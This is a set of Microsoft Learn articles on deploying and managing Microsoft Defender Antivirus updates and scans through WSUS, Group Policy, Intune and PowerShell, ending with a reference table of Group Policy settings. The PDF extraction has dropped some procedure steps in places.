The Windows Server Update Services Configuration Wizard is complete.
1. Open the Update Services snap-in console, and navigate to YR2K19. The console is
shown in the following figure.
2. When synchronization is complete, you can see how many products and
classifications have been added in the last 30 days. Check to ensure the status for
Last synchronization result indicates Succeeded. You may see a warning indicating
"Your WSUS server currently shows that no computers are registered to receive
updates". This warning is normal at this point of the deployment configuration
process.
View update details

1. In the Update Services console, in the navigation tree, go to > Update Services >
YR2K19 > Updates > All Updates.
2. In the Actions column, select Search. Search opens. In Text, type defender, and
press ENTER. The results field under Update Title lists updates that include the
word Defender in the title. For example Windows Defender and Microsoft Defender
Antivirus updates for Platform, Engine, and Intelligence. Example results are shown
in the next image.
See Viewing and Managing Updates.
3. In the Search dialog, under Update Title, double-click one of the listed KB items.
One of two things happens:
If you don't have Microsoft Report Viewer 2012 Redistributable installed, the
following error message appears:
Follow the link in the error message to install the Microsoft Report Viewer
2012 Redistributable before proceeding to the next numbered step of this
procedure.
If Microsoft Report Viewer 2012 Redistributable installed, Update Report for

YR2k19 opens, presenting a report with information related to the KB you
previously selected. An example report is shown in the following image.

To learn more about the different Microsoft Defender Antivirus Update channels,
see Manage the gradual rollout process for Microsoft Defender updates
To find out which Platform Update version is the Current Channel

(Broad)
1. Go to the Microsoft Update Catalog . (This link automatically loads a search
filtered to KB4052623)
2. Search for a KB by name. For example, In the search box, type KB4052623, and
then select Search.
For example, on April 11, 2023, the latest production version is 4.18.2302.7, where
23 == 2023, 02 == February, and .7 is the minor revision.

To determine if updates are synchronized
1. In the Update Services console, go > Update Services > YR2K19 > Updates > All
Updates.
2. In Approval, select Any Except Declined, and the select Refresh.
The All Updates view lists "Platform Updates" and "Security Intelligence Updates"
(also known as signatures/definitions). For example, KB4052623 platform updates.
KB4052623 platform update is shown in the following figure:
3. Select KB4052623 version 4.18.2302.7 to see the synchronization status.
７ Note
For the "Security Intelligence Updates", please see Appendix A. For the
"Engine Updates", please see Appendix B. For the "Platform Updates", please
see Appendix C.
Approve and deploy updates in WSUS

1. In the Update Services console, go > Update Services > YR2K19 > Computers >
Options. The Options window opens
2. Select Automatic Approvals to launch the Automatic Approvals configuration

wizard.
3. In Automatic Approvals page, on the Update Rules tab, select OK.

4. On the Add Rule page, is Step 1, select When an update is in a specific
classification and When an update is in a specific product.
5. In Choose Products, scroll to Forefront, and then select Forefront Client Security.
Scroll to Windows, and then select Microsoft Defender Antivirus, and then select
OK. The workflow returns you to the Add Rule page.
6. On the Add Rule page, in Step 1: Select Properties, ensure the following are
selected:
When an update is in a specific classification

When an updates is in a specific product
Set a deadline for the approval
In Step 2: Edit the properties:
In When an update is in, ensure Forefront Client Security, System Center

Endpoint Protection, Microsoft Defender Antivirus are listed.
In Set a deadline for, select The same day as the approval at 5:00 AM.
In Step 3: Specify a name, type a name for your rule. For example, type Microsoft
Defender Antivirus updates. These settings are shown in the following figure:

7. Select OK. The work flow returns to the Update Rules page. Select your new rule,
For example, select Microsoft Defender Antivirus updates.
8. In Rule Properties, verify the information is correct, and then select OK.
Define the order of sources for downloading security intelligence

updates
1. On your Group Policy management computer, open the Group Policy
Management Console, right-click the Group Policy Object you want to configure
and select Edit.
2. In the Group Policy Management Editor go to Computer configuration, select

Policies, then select Administrative templates.
updates.
Double-click the Define the order of sources for downloading security
intelligence updates setting and set the option to Enabled.
In Options, type InternalDefinitionUpdateServer, and then select OK. The

configured Define the order of sources for downloading security
intelligence updates page is shown in the following figure.
For more information, see Manage how and where Microsoft Defender Antivirus
receives updates.
See also
Microsoft Defender Antivirus ring deployment
Microsoft Defender Antivirus production ring deployment using Group Policy and
Feedback

Group Policy and Windows Server
Update Services
Article • 08/02/2023
Applies to:

Platforms
Windows
Windows Server

 Tip
Before you begin

This article assumes that you have experience with Windows Server Update Services
(WSUS) and/or already have WSUS installed. If you aren't already familiar with WSUS,
see the following articles for important configuration details:
Configure WSUS - Applies to: Windows Server 2022, Windows Server 2019,
Windows Server 2016, Windows Server 2012 R2, Windows Server 2012)
[Configure Windows Server Update Services (WSUS) in Analytics Platform System]
[/sql/analytics-platform-system/configure-windows-server-update-services-
wsus.md] - Analytics Platform System

This section provides information about setting up the production environment using
Group Policy and Windows Server Update Services (WSUS).
７ Note

1. On the left pane of Server Manager, select Dashboard > Tools > Windows Server
Update Services.
７ Note
If the Complete WSUS Installation dialog box appears, select Run. In the
Complete WSUS Installation dialog box, select Close when the installation
successfully finishes.
2. The WSUS Configuration Wizard opens. On the Before you Begin page, review
the information, and then select Next.
3. Read the instructions on the Join the Microsoft Update Improvement Program
page. Keep the default selection if you want to participate in the program, or clear
the checkbox if you don't. Then select Next.
4. On the Choose Upstream Server page, select Synchronize from another Windows
Server Update Services server.
In Server name, enter the server name. For example, type YR2K19.
In Port number enter the port on which this server communicates with the
upstream server. For example, type 8530.
This is shown in the following figure.
5. Select Next.
An autonomous downstream server, like a replica server, also uses another WSUS
server as its master repository, but allows for individual approvals for updates
different from approvals of the master. The autonomous server:
Allows flexibility in creating computer groups

Doesn't have to be in the same Active Directory forest as the master
6. (Optional, depending on configuration) On the Specify Proxy Server page, select

the Use a proxy server when synchronizing checkbox. Then enter the proxy server
name and port number (port 80 by default) in the corresponding boxes.
） Important
You must complete this step if you identified that WSUS needs a proxy server
to have internet access.
If you want to connect to the proxy server by using specific user credentials,
select the Use user credentials to connect to the proxy server checkbox.
Then enter the user name, domain, and password of the user in the
corresponding boxes.
If you want to enable basic authentication for the user who is connecting to
the proxy server, select the Allow basic authentication (password is sent in
cleartext) checkbox.
Select Next.
7. On the Connect to Upstream Server page, select start Connecting. When WSUS
connects to the server, select Next.
8. On the Choose Languages page, you can select the languages from which WSUS
receives updates: all languages or a subset of languages. Selecting a subset of
languages saves disk space, but it's important to choose all the languages that all
the clients need on this WSUS server.
If you choose to get updates only for specific languages, select Download updates
only in these languages, and then select the languages for which you want
updates. Otherwise, leave the default selection.
２ Warning
If you select the option Download updates only in these languages, and the
server has a downstream WSUS server connected to it, selecting this option
will force the downstream server to also use only the selected languages.
After you select the language options for your deployment, select Next.
9. The Set Sync Schedule page opens. (The Choose Products and Choose
Classifications pages are grayed out and can't be configured).
Select Synchronize automatically, the WSUS server synchronizes at set

intervals.
In First synchronization specify a time for the first synchronization. For
example, select 5:00:00 PM.
In Synchronizations per day, specify the number of times you want
synchronizations to occur. For example, select 1, and then select Next.
10. On the Finished page, select Next.
11. On the What's next page, select Next to finish.
Define the order of sources for downloading security intelligence

updates
1. On your Group Policy management computer, open the Group Policy
Management Console, right-click the Group Policy Object you want to configure
and select Edit.
2. In the Group Policy Management Editor go to Computer configuration, select

Policies, then select Administrative templates.
updates.
Double-click the Define the order of sources for downloading security

intelligence updates setting and set the option to Enabled.
In Options, type InternalDefinitionUpdateServer, and then select OK. The

configured Define the order of sources for downloading security
intelligence updates page is shown in the following figure.
4. In Define the order of sources for downloading security intelligence updates,

select Enabled. In Options, enter the order of sources for downloading security
intelligence updates. For example, type InternalDefinitionUpdateServer.


4. Under Options, change the entry to FileShares, select Apply, and then select OK.


Group Policy:


original setting.
InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC|FileShare .
See also:
Step 3: Configure WSUS | Microsoft Learn

Step 4: Approve and Deploy WSUS Updates | Microsoft Learn
Step 5: Configure Group Policy Settings for Automatic Updates | Microsoft Learn
Microsoft Defender Antivirus pilot ring deployment using Group Policy and
Feedback

Appendices for Microsoft Defender
Antivirus ring deployment using Group
Policy and Windows Server Update
Services (WSUS)
Article • 01/05/2024
Applies to:

Platforms
Windows
Windows Server

 Tip
Appendix A - Security Intelligence Updates

Microsoft continually updates security intelligence in antimalware products to cover the
latest threats and to constantly tweak detection logic. The updates enhance the ability
of Microsoft Defender Antivirus and other Microsoft antimalware solutions to accurately
identify threats. This security intelligence works directly with cloud-based protection to
deliver fast and powerful AI-enhanced, next-generation protection.
References:
Security intelligence updates for Microsoft Defender Antivirus and other Microsoft
antimalware
Description of Forefront endpoint security definition updates
Appendix B - Engine Updates

Engine updates are the updates for the scan engine, which is used by the "Security
Intelligence Updates". First released on July 15, 2010.
Appendix C - Platform Updates

Platform Updates, are the .exe's, dll's, and .sys's for the Microsoft Defender Antivirus
service.
ﾉ Expand table
Channel: Version: Revision: Remarks
Beta Channel - 4.18.2304.4 '23 April, n/a This channel is the one you want to test
Prerelease minor rev 4 for app compatibility, reliability and
performance.
Current 4.18.2303.8 '23 Mar, n/a Same as for Beta Channel - Prerelease
Channel minor rev 8
(Preview)
Current 4.18.2303.7 '23 Mar, n/a Same as for Beta Channel - Prerelease
Channel minor rev 7
(Staged)
Current 4.18.2302.7 '23 Feb, '23 This channel is the one you want to push
Channel see note minor rev 7 Mar out to 90%-100% of your production
(Broad) systems.
７ Note
Where 23 == 2023, 02 == February, and .7 is the minor revision.
See also
Microsoft Defender Antivirus pilot ring deployment using Group Policy and Windows
Server Update Services
Feedback

Manage Microsoft Defender Antivirus
updates and scans for endpoints that
are out of date
Article • 03/15/2023
Applies to:

Platforms
Windows
With Microsoft Defender Antivirus, your security team can define how long an endpoint
can avoid an update or how many scans it can miss before it's required to receive the
update and run a scan. This capability is especially useful in environments where devices
aren't often connected to a corporate or external network, or for devices that aren't
used on a daily basis.
For example, an employee who uses a particular computer takes three days off of work,
and doesn't sign on their computer during that time. When the employee returns to
work and signs into their computer, Microsoft Defender Antivirus will immediately check
and download the latest protection updates, and then run a scan.
Set up catch-up protection updates for

endpoints that haven't updated for a while
If Microsoft Defender Antivirus didn't download protection updates for a specified
period, you can set it up to automatically check and download the latest update the
next time someone signs in on an endpoint. This configuration is useful if you have
globally disabled automatic update downloads on startup.
You can use one of several methods to set up catch-up protection updates:
Group Policy
PowerShell cmdlets
Use Configuration Manager to configure catch-up
protection updates
you want to change (select Assets and Compliance in the navigation pane on the
Policies)
2. Go to the Security intelligence updates section and configure the following

settings:
Set Force a security intelligence update if the client computer is offline for
more than two consecutive scheduled updates to Yes.
For the If Configuration Manager is used as a source for security
intelligence updates..., specify the hours before which the protection updates
delivered by Configuration Manager should be considered out of date. This
setting causes the next update location to be used, based on the defined
fallback source order.
3. Select OK.
Use Group Policy to enable and configure the catch-up

update feature
Edit.
Signature Updates.
5. Double-click the Define the number of days after which a catch-up security
intelligence update is required setting and set the option to Enabled. Enter the
number of days after which you want Microsoft Defender Antivirus to check for
and download the latest protection update.
6. Select OK.
Use PowerShell cmdlets to configure catch-up protection
updates
Use the following cmdlet:
PowerShell
Set-MpPreference -SignatureUpdateCatchupInterval
For more information about using PowerShell with Microsoft Defender Antivirus, see the
following articles:
Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus

Use Windows Management Instruction (WMI) to

configure catch-up protection updates
WMI
SignatureUpdateCatchupInterval
See the following article for more information and allowed parameters:
Set the number of days before protection is

reported as out of date
You can also specify the number of days after which Microsoft Defender Antivirus
protection is considered old or out of date. After the specified number of days, the client
will report itself as "out of date" and will show an error to the endpoint user. When an
endpoint is considered out of date, Microsoft Defender Antivirus might attempt to
download an update from other sources (based on the defined fallback source order).
You can use Group Policy to specify the number of days after which endpoint protection
is considered to be out of date.
Use Group Policy to specify the number of days before
protection is considered out of date
Edit.
Signature Updates and configure the following settings:
a. Double-click Define the number of days before spyware definitions are

considered out of date and set the option to Enabled. Enter the number of
days after which you want Microsoft Defender Antivirus to consider spyware
Security intelligence to be out of date.
b. Select OK.
c. Double-click Define the number of days before virus definitions are

considered out of date and set the option to Enabled. Enter the number of
days after which you want Microsoft Defender Antivirus to consider virus
Security intelligence to be out of date.
d. Select OK.
Set up catch-up scans for endpoints that have

not been scanned for a while
You can set the number of consecutive scheduled scans that can be missed before
Microsoft Defender Antivirus will force a scan.
The process for enabling this feature is:
1. Set up at least one scheduled scan (see the Scheduled scans article).
2. Enable the catch-up scan feature.
3. Define the number of scans that can be skipped before a catch-up scan occurs.
This feature can be enabled for both full and quick scans.
 Tip
We recommend using quick scans for most situations. To learn more, see Quick
scan, full scan, and custom scan.
You can use one of several methods to set up catch-up scans:
Group Policy
Use PowerShell cmdlets to configure catch-up scans
Use Group Policy to enable and configure the catch-up

scan feature
1. Ensure you have set up at least one scheduled scan.
5. Expand the tree to Windows components > Microsoft Defender Antivirus > Scan
and configure the following settings:
If you have set up scheduled quick scans, double-click the Turn on catch-up
quick scan setting and set the option to Enabled.
If you have set up scheduled full scans, double-click the Turn on catch-up full
scan setting and set the option to Enabled. Select OK.
Double-click the Define the number of days after which a catch-up scan is
forced setting and set the option to Enabled.
Enter the number of scans that can be missed before a scan will be
automatically run when the user next signs in on the endpoint. The type of
scan that is run is determined by the Specify the scan type to use for a
scheduled scan (see the Schedule scans article). Select OK.
７ Note
The Group Policy setting title refers to the number of days. The setting, however, is
applied to the number of scans (not days) before the catch-up scan will be run.
Use PowerShell cmdlets to configure catch-up scans

PowerShell
Set-MpPreference -DisableCatchupFullScan
Set-MpPreference -DisableCatchupQuickScan
For more information about using PowerShell with Microsoft Defender Antivirus, see the
following articles:
Use PowerShell cmdlets to manage Microsoft Defender Antivirus


configure catch-up scans
WMI
DisableCatchupFullScan
DisableCatchupQuickScan
See the following article for more information and allowed parameters:
Use Configuration Manager to configure catch-up scans

you want to change (select Assets and Compliance in the navigation pane on the
Policies)
2. Go to the Scheduled scans section and Force a scan of the selected scan type if
client computer is offline... to Yes.
3. Select OK.
 Tip

Related articles
Manage when protection updates should be downloaded and applied
 Tip
Feedback

Article • 02/27/2024
Applies to:
Platforms
Windows
Microsoft Defender Antivirus allows you to determine if updates should (or shouldn't)
occur after certain events, such as at startup or after receiving specific reports from the
cloud-delivered protection service.
Check for protection updates before running a

scan
You can use Microsoft Defender for Endpoint Security Settings Management, Microsoft
Intune, Microsoft Configuration Manager, Group Policy, PowerShell cmdlets, and WMI to
force Microsoft Defender Antivirus to check and download protection updates before
running a scheduled scan.
Use Microsoft Defender for Endpoint Security Settings

Management to check for protection updates before
running a scan
1. On your Microsoft Defender for Endpoint console
(https://security.microsoft.com ), go to Endpoints > Configuration management
> Endpoint security policies > Create new policy.
In the Select Templates list, select Microsoft Defender Antivirus.
2. Fill in the name and description, and then select Next>

3. Go to the Scheduled scans section and set Check For Signatures Before Running
Scan to Enabled.
Use Microsoft Intune to check for protection updates

before running a scan
1. In the Microsoft Intune admin center , go to Endpoints > Configuration
management > Endpoint security policies, and then select Create new policy.
In the Select Templates list, select Microsoft Defender Antivirus.
2. Fill in the name and description, and then select Next.
3. Go to the Scheduled scans section, and set Check For Signatures Before Running
Scan to Enabled.
4. Save and deploy the policy.
Use Configuration Manager to check for protection

updates before running a scan
you want to change (select Assets and Compliance in the navigation pane, then
expand the tree to Overview > Endpoint Protection > Antimalware Policies).
2. Go to the Scheduled scans section and set Check for the latest security
intelligence updates before running a scan to Yes.
3. Select OK.
Use Group Policy to check for protection updates before

running a scan
Console.
5. Expand the tree to Windows components > Microsoft Defender Antivirus > Scan.
6. Double-click Check for the latest virus and spyware definitions before running a
scheduled scan and set the option to Enabled.
7. Select OK.
Use PowerShell cmdlets to check for protection updates

before running a scan
PowerShell
Set-MpPreference -CheckForSignaturesBeforeRunningScan
Use Windows Management Instruction (WMI) to check

for protection updates before running a scan
WMI
CheckForSignaturesBeforeRunningScan
For more information, see Windows Defender WMIv2 APIs.
Check for protection updates on startup

You can use Group Policy to force Microsoft Defender Antivirus to check and download
protection updates when the machine is started.

Security Intelligence Updates.
5. Double-click Check for the latest virus and spyware definitions on startup and set
the option to Enabled.
6. Select OK.
You can also use Group Policy, PowerShell, or WMI to configure Microsoft Defender
Antivirus to check for updates at startup even when it isn't running.
Use Group Policy to download updates when Microsoft

Defender Antivirus is not present
2. Using the Group Policy Management Editor, go to Computer configuration.
5. Double-click Initiate security intelligence update on startup and set the option to
Enabled.
6. Select OK.
Use PowerShell cmdlets to download updates when

Microsoft Defender Antivirus is not present
PowerShell
Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine
For more information, see Use PowerShell cmdlets to manage Microsoft Defender
Antivirus and Defender Antivirus cmdlets for more information on how to use
PowerShell with Microsoft Defender Antivirus.
download updates when Microsoft Defender Antivirus is
not present
WMI
SignatureDisableUpdateOnStartupWithoutEngine
Allow ad hoc changes to protection based on

cloud-delivered protection
Microsoft Defender Antivirus can make changes to its protection based on cloud-
delivered protection. Such changes can occur outside of normal or scheduled protection
updates.
If you have enabled cloud-delivered protection, Microsoft Defender Antivirus sends files
it's suspicious about to the Windows Defender cloud. If the cloud service reports that
the file is malicious, and the file is detected in a recent protection update, you can use
Group Policy to configure Microsoft Defender Antivirus to automatically receive that
protection update. Other important protection updates can also be applied.
Use Group Policy to automatically download recent

updates based on cloud-delivered protection
5. Double-click Allow real-time security intelligence updates based on reports to

Microsoft MAPS and set the option to Enabled. Then select OK.
6. Allow notifications to disable definitions-based reports to Microsoft MAPS and
set the option to Enabled. Then select OK.
７ Note
Allow notifications to disable definitions based reports enables Microsoft MAPS

to disable those definitions known to cause false-positive reports. You must
configure your computer to join Microsoft MAPS for this function to work.
 Tip

See also
Manage when protection updates should be downloaded and applied
 Tip
Feedback

Manage updates for mobile devices and
virtual machines (VMs)
Article • 03/15/2023
Applies to:

Platforms
Windows
Mobile devices and VMs may require more configuration to ensure performance is not
impacted by updates.
There are two settings that are useful for these devices:
Opt in to Microsoft Update on mobile computers without a WSUS connection

Prevent Security intelligence updates when running on battery power
The following articles may also be useful in these situations:
Configuring scheduled and catch-up scans

Deployment guide for Microsoft Defender Antivirus in a virtual desktop
infrastructure (VDI) environment
Opt in to Microsoft Update on mobile

computers without a WSUS connection
You can use Microsoft Update to keep Security intelligence on mobile devices running
Microsoft Defender Antivirus up to date when they are not connected to the corporate
network or don't otherwise have a WSUS connection.
This means that protection updates can be delivered to devices (via Microsoft Update)
even if you have set WSUS to override Microsoft Update.
You can opt in to Microsoft Update on the mobile device in one of the following ways:
Change the setting with Group Policy.

Use a VBScript to create a script, then run it on each computer in your network.
Manually opt in every computer on your network through the Settings menu.
Use Group Policy to opt in to Microsoft Update

Signature Updates.
5. Set Allow security intelligence updates from Microsoft Update to Enabled, and
then select OK.
Use a VBScript to opt in to Microsoft Update

1. Use the instructions in the MSDN article Opt-In to Microsoft Update to create the
VBScript.
2. Run the VBScript you created on each computer in your network.
Manually opt in to Microsoft Update

1. Open Windows Update in Update & security settings on the computer you want
to opt in.
2. Select Advanced options.
3. Select the checkbox for Give me updates for other Microsoft products when I
update Windows.
Prevent Security intelligence updates when

running on battery power
You can configure Microsoft Defender Antivirus to only download protection updates
when the PC is connected to a wired power source.
Use Group Policy to prevent security intelligence updates
on battery power
Console, choose the Group Policy Object you want to configure, and open it for
editing.
Signature Updates, and then set Allow security intelligence updates when
running on battery power to Disabled. Then select OK.
This action prevents protection updates from downloading when the PC is on battery
power.
 Tip

Related articles
Update and manage Microsoft Defender Antivirus in Windows 10
 Tip
Feedback

Manage Microsoft Defender Antivirus in
your business
Article • 02/27/2024
Applies to:

Platforms
Windows
Windows Server
 Tip
For the best experience, please choose 1 method for configuring the Microsoft
Defender Antivirus policies.
） Important
Group Policy (GPO) wins over Microsoft Configuration Manager wins over Microsoft
Intune wins over Microsoft Defender for Endpoint Security Configuration
Management or Powershell or WMI or MpCmdRun.exe. You can manage and
configure Microsoft Defender Antivirus with the following tools:
Microsoft Defender for Endpoint Security Configuration Management

Microsoft Intune
Group Policy
PowerShell cmdlets
The Microsoft Malware Protection Command Line Utility (referred to as the
mpcmdrun.exe utility)
The following articles provide further information, links, and resources for using these
tools to manage and configure Microsoft Defender Antivirus.
ﾉ Expand table
Article Description
Manage Microsoft Defender Antivirus Information about using the Microsoft Defender for
with Microsoft Defender for Endpoint Endpoint Security Configuration Management to
Security Configuration Management configure, manage, and report, Microsoft Defender
Antivirus
Manage Microsoft Defender Antivirus Information about using Intune and Configuration
with Microsoft Intune and Microsoft Manager to deploy, manage, report, and configure
Endpoint Configuration Manager Microsoft Defender Antivirus
Manage Microsoft Defender Antivirus List of all Group Policy settings located in ADMX
with Group Policy settings templates
Manage Microsoft Defender Antivirus Instructions for using PowerShell cmdlets to manage
with PowerShell cmdlets Microsoft Defender Antivirus, plus links to
documentation for all cmdlets and allowed
parameters
Manage Microsoft Defender Antivirus Instructions for using WMI to manage Microsoft
with Windows Management Defender Antivirus, plus links to documentation for
Instrumentation (WMI) the WMIv2 APIs (including all classes, methods, and
properties)
Manage Microsoft Defender Antivirus Instructions on using the dedicated command-line

with the MpCmdRun.exe command-line tool to manage and use Microsoft Defender Antivirus
tool
If running high CPU in Antimalware Service Executable | Microsoft Defender Antivirus

Service | MsMpEng.exe, please review:
 Tip

 Tip
Feedback

Use Microsoft Intune to configure and
Article • 02/19/2024
Applies to:

Platforms
Windows
You can use the Microsoft Intune family of products to configure Microsoft Defender
Antivirus scans, like Microsoft Intune and Configuration Manager.
Configure Microsoft Defender Antivirus scans

in Intune
1. Go to the Microsoft Intune admin center (https://endpoint.microsoft.com ), and
sign in.
2. Navigate to Endpoint Security.
3. Under Manage, choose Antivirus.
4. Select your Microsoft Defender Antivirus policy.
5. Under Manage, choose Properties.
6. Next to Configuration settings, choose Edit.
） Important
AllowIntrusionPreventionSystem antivirus settings is officially being

deprecated and as such cannot be configured.
7. Expand the Scan section, and review or edit your scanning settings.
8. Choose Review + save.

 Tip
Need help? See Manage endpoint security in Microsoft Intune.
 Tip

Related articles
Reference articles for management and configuration tools
 Tip


top scans per file
 Tip
Feedback

Use Group Policy settings to configure
and manage Microsoft Defender
Antivirus
Article • 05/24/2023
Applies to:

Platforms
Windows
We recommend using Microsoft Intune to manage Microsoft Defender Antivirus settings

for your organization. However, you can use Group Policy to configure and manage
some settings for Microsoft Defender Antivirus.
） Important
If tamper protection is enabled in your organization, any changes made to tamper-

protected settings are ignored. In addition, you cannot turn off tamper protection
by using Group Policy.
protection, we recommend using troubleshooting mode to temporarily disable
tamper protection on the device. Note that after troubleshooting mode ends, any
changes made to tamper-protected settings are reverted to their configured state.
Configure Microsoft Defender Antivirus using

Group Policy
In general, you can use the following procedure to configure or change some settings
for Microsoft Defender Antivirus.
Console, right-click the Group Policy Object (GPO) you want to configure and click
Edit.
3. Click Administrative templates.
5. Expand the section (referred to as Location in the table in this topic) that contains
the setting you want to configure, double-click the setting to open it, and make
6. Deploy the updated GPO as you normally do.
Group Policy settings and resources

The following table lists commonly used Group Policy settings that are available in
Windows 10.
 Tip
For the most current settings, see get the latest ADMX files in your central store to
access the correct policy options. See How to create and manage the Central Store
for Group Policy Administrative Templates in Windows and download the latest
files.
ﾉ Expand table
Location Setting Article
Client interface Enable headless UI mode Prevent users from seeing or interacting with the
Microsoft Defender Antivirus user interface
Client interface Display additional text to Configure the notifications that appear on
clients when they need to endpoints
perform an action
Client interface Suppress all notifications Configure the notifications that appear on
endpoints
Client interface Suppresses reboot Configure the notifications that appear on

notifications endpoints
Exclusions Extension Exclusions Configure and validate exclusions in Microsoft

Defender Antivirus scans
Exclusions Path Exclusions Configure and validate exclusions in Microsoft

Exclusions Process Exclusions Configure and validate exclusions in Microsoft

Exclusions Turn off Auto Exclusions Configure and validate exclusions in Microsoft
MAPS Configure the "Block at Enable block at first sight

First Sight" feature
MAPS Join Microsoft MAPS Enable cloud-delivered protection
MAPS Send file samples when Enable cloud-delivered protection

further analysis is required
MAPS Configure local setting Prevent or allow users to locally modify policy
override for reporting to settings
Microsoft MAPS
MpEngine Configure extended cloud Configure the cloud block timeout period
check
MpEngine Select cloud protection Specify the cloud-delivered protection level

level
Network Specify additional Not used (deprecated)

inspection definition sets for network
system traffic inspection
Network Turn on definition Not used (deprecated)

inspection retirement
system
Network Turn on protocol Not used (deprecated)

inspection recognition
system
Quarantine Configure local setting Prevent or allow users to locally modify policy
override for the removal of settings
items from Quarantine
folder
Quarantine Configure removal of items Configure remediation for Microsoft Defender

from Quarantine folder Antivirus scans
Real-time Configure local setting Prevent or allow users to locally modify policy
protection override for monitoring file settings
and program activity on
your computer
protection override for monitoring for settings
incoming and outgoing file
activity
protection override for scanning all settings
downloaded files and
attachments
protection override for turn on settings
behavior monitoring
protection override to turn on real- settings
time protection
Real-time Define the maximum size Enable and configure Microsoft Defender
protection of downloaded files and Antivirus always-on protection and monitoring
attachments to be scanned
Real-time Monitor file and program Enable and configure Microsoft Defender
protection activity on your computer Antivirus always-on protection and monitoring
Real-time Scan all downloaded files Enable and configure Microsoft Defender
protection and attachments Antivirus always-on protection and monitoring
Real-time Turn off real-time Enable and configure Microsoft Defender

protection protection Antivirus always-on protection and monitoring
Real-time Turn on behavior Enable and configure Microsoft Defender

protection monitoring Antivirus always-on protection and monitoring
Real-time Turn on process scanning Enable and configure Microsoft Defender

protection whenever real-time Antivirus always-on protection and monitoring
protection is enabled
Real-time Turn on raw volume write Enable and configure Microsoft Defender
protection notifications Antivirus always-on protection and monitoring
Real-time Configure monitoring for Enable and configure Microsoft Defender

protection incoming and outgoing file Antivirus always-on protection and monitoring
and program activity
Remediation Configure local setting Prevent or allow users to locally modify policy
override for the time of day settings
to run a scheduled full scan
Remediation Specify the day of the week Configure scheduled Microsoft Defender Antivirus
to run a scheduled full scan scans
Remediation Specify the time of day to Configure scheduled Microsoft Defender Antivirus
run a scheduled full scan to scans
complete remediation
Reporting Turn off enhanced Configure the notifications that appear on

notifications endpoints
Root Turn off Microsoft Not used. If you're using or planning to use a
Defender Antivirus non-Microsoft antivirus product, see Microsoft
Defender Antivirus compatibility with other
security products.
Root Define addresses to bypass Configure device proxy and Internet connectivity
proxy server settings
Root Define proxy autoconfig Configure device proxy and Internet connectivity
(.pac) for connecting to the settings
network
Root Define proxy server for Configure device proxy and Internet connectivity
connecting to the network settings
Root Configure local Prevent or allow users to locally modify policy

administrator merge settings
behavior for lists
Root Allow antimalware service Configure remediation for Microsoft Defender

to start up with normal Antivirus scans
priority
Root Allow antimalware service Configure remediation for Microsoft Defender

to remain running always Antivirus scans
Root Turn off routine Configure remediation for Microsoft Defender

remediation Antivirus scans
Root Randomize scheduled task Configure scheduled scans for Microsoft Defender
times Antivirus
Scan Allow users to pause scan Prevent users from seeing or interacting with the
Microsoft Defender Antivirus user interface (Not
supported on Windows 10)
Scan Check for the latest virus Manage event-based forced updates
and spyware definitions
before running a scheduled

scan
Scan Define the number of days Manage updates for endpoints that are out of
after which a catch-up scan date
is forced
Scan Turn on catch up full scan Manage updates for endpoints that are out of
date
Scan Turn on catch up quick Manage updates for endpoints that are out of
scan date
Scan Configure local setting Prevent or allow users to locally modify policy
override for maximum settings
percentage of CPU
utilization
override for schedule scan settings
day
override for scheduled settings
quick scan time
override for scheduled scan settings
time
override for the scan type settings
to use for a scheduled scan
Scan Create a system restore Configure remediation for Microsoft Defender

point Antivirus scans
Scan Turn on removal of items Configure remediation for Microsoft Defender

from scan history folder Antivirus scans
Scan Turn on heuristics Enable and configure Microsoft Defender

Antivirus always-on protection and monitoring
Scan Turn on e-mail scanning Configure scanning options in Microsoft Defender

Antivirus
Scan Turn on reparse point Configure scanning options in Microsoft Defender

scanning Antivirus
Scan Run full scan on mapped Configure scanning options in Microsoft Defender
network drives Antivirus
Scan Scan archive files Configure scanning options in Microsoft Defender

Antivirus
Scan Scan network files Configure scanning options in Microsoft Defender

Antivirus
Scan Scan packed executables Configure scanning options in Microsoft Defender

Antivirus
Scan Scan scripts Configure scanning options in Microsoft Defender

Antivirus
Also see Defender/AllowScriptScanning.
Scan Scan removable drives Configure scanning options in Microsoft Defender

Antivirus
Scan Specify the maximum Configure scanning options in Microsoft Defender

depth to scan archive files Antivirus
Scan Specify the maximum Configure scanning options in Microsoft Defender

percentage of CPU Antivirus
utilization during a scan
Scan Specify the maximum size Configure scanning options in Microsoft Defender
of archive files to be Antivirus
scanned
Scan Specify the day of the week Configure scheduled scans for Microsoft Defender
to run a scheduled scan Antivirus
Scan Specify the interval to run Configure scheduled scans for Microsoft Defender
quick scans per day Antivirus
Scan Specify the scan type to Configure scheduled scans for Microsoft Defender
use for a scheduled scan Antivirus
Scan Specify the time for a daily Configure scheduled scans for Microsoft Defender
quick scan Antivirus
Scan Specify the time of day to Configure scheduled scans for Microsoft Defender
run a scheduled scan Antivirus
Scan Start the scheduled scan Configure scheduled scans for Microsoft Defender
only when computer is on Antivirus
but not in use
Security Allow security intelligence Manage updates for mobile devices and virtual
intelligence updates from Microsoft machines (VMs)
updates Update
Security Allow security intelligence Manage updates for mobile devices and virtual
intelligence updates when running on machines (VMs)
updates battery power
Security Allow notifications to Manage event-based forced updates

intelligence disable definitions-based
updates reports to Microsoft MAPS
Security Allow real-time security Manage event-based forced updates

intelligence intelligence updates based
updates on reports to Microsoft
MAPS
Security Check for the latest virus Manage event-based forced updates
intelligence and spyware definitions on
updates startup
Security Define file shares for Manage Microsoft Defender Antivirus protection
intelligence downloading security and security intelligence updates
updates intelligence updates
Security Define the number of days Manage updates for endpoints that are out of
intelligence after which a catch up date
updates security intelligence update
is required
intelligence before spyware definitions date
updates are considered out of date
intelligence before virus definitions are date
updates considered out of date
Security Define the order of sources Manage Microsoft Defender Antivirus protection
intelligence for downloading security and security intelligence updates
Security Initiate security intelligence Manage event-based forced updates

intelligence update on startup
updates
Security Specify the day of the week Manage when protection updates should be
intelligence to check for security downloaded and applied
Security Specify the interval to Manage when protection updates should be

intelligence check for security downloaded and applied
Security Specify the time to check Manage when protection updates should be
intelligence for security intelligence downloaded and applied
updates updates
Security Turn on scan after Security Configure scheduled scans for Microsoft Defender
intelligence intelligence update Antivirus
updates
Threats Specify threat alert levels at Configure remediation for Microsoft Defender
which default action should Antivirus scans
not be taken when
detected
Threats Specify threats upon which Configure remediation for Microsoft Defender
default action should not Antivirus scans
be taken when detected
 Tip

 Tip

top scans per file
See also
Reference topics for management and configuration tools
 Tip
Feedback

Use PowerShell cmdlets to configure
